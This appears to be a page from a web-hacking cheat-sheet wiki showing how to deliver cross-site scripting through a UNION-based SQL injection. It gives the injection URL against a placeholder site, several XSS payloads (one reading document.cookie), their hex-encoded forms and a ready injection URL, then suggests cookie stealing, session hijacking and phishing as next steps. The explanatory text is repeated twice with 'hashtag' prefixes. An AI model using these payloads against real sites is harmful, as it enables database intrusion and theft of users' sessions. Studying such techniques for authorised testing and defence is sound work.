☢️XSS Injection with SQLi (XSSQLi)

Injecting XSS into the Query:

Once getting the Number of Column is done and we are ready with our Union Query. Lets assume we have 4 Columns so our Union query will be:

http://exploitable-web.com/link.php?id=1' union select 1,2,3,4--

Lets say the 3rd column gets printed on the webpage as output. So we will inject our XSS payload into it. To make things simple we will encode our payload into hex.

Our XSS injection Payloads:

<img src=x onerror=confirm(/XSS/)>
<img src=x onerror=confirm(document.domain)>
<img src=x onerror=confirm(document.cookie)>
'"><img src=x onerror=confirm(origin)>

Hex Encoded values:

0x3c696d67207372633d78206f6e6572726f723d636f6e6669726d282f5853532f293e

0x3c696d67207372633d78206f6e6572726f723d636f6e6669726d28646f63756d656e742e646f6d61696e293e

0x3c696d67207372633d78206f6e6572726f723d636f6e6669726d28646f63756d656e742e636f6f6b6965293e

0x27223E3C696D67207372633D78206F6E6572726F723D636F6E6669726D286F726967696E293E

Injecting our payload:


http://exploitable-web.com/link.php?id=-1' union select 1,2,0x3c696d67207372633d78206f6e6572726f723d636f6e6669726d282f5853532f293e,4--

The above url will output the our XSS payload into the Website. This one is basic XSS payload, now we are free to do other things using XSS like Cookie stealing, XSS phishing,XSS iFrame Phishing, Chained XSS, Session Hijacking, CSRF attack, XssDdos and other attacks

PreviousDIOS Oracle NextLogin Bypass Using SQL Injection

Last updated 1 year ago

hashtagInjecting XSS into the Query:

hashtagOnce getting the Number of Column is done and we are ready with our Union Query. Lets assume we have 4 Columns so our Union query will be:

hashtagLets say the 3rd column gets printed on the webpage as output. So we will inject our XSS payload into it. To make things simple we will encode our payload into hex.

hashtagOur XSS injection Payloads:

hashtagHex Encoded values:

hashtagInjecting our payload:

hashtagThe above url will output the our XSS payload into the Website. This one is basic XSS payload, now we are free to do other things using XSS like Cookie stealing, XSS phishing,XSS iFrame Phishing, Chained XSS, Session Hijacking, CSRF attack, XssDdos and other attacks

Injecting XSS into the Query:

Once getting the Number of Column is done and we are ready with our Union Query. Lets assume we have 4 Columns so our Union query will be:

Lets say the 3rd column gets printed on the webpage as output. So we will inject our XSS payload into it. To make things simple we will encode our payload into hex.

Our XSS injection Payloads:

Hex Encoded values:

Injecting our payload:

The above url will output the our XSS payload into the Website. This one is basic XSS payload, now we are free to do other things using XSS like Cookie stealing, XSS phishing,XSS iFrame Phishing, Chained XSS, Session Hijacking, CSRF attack, XssDdos and other attacks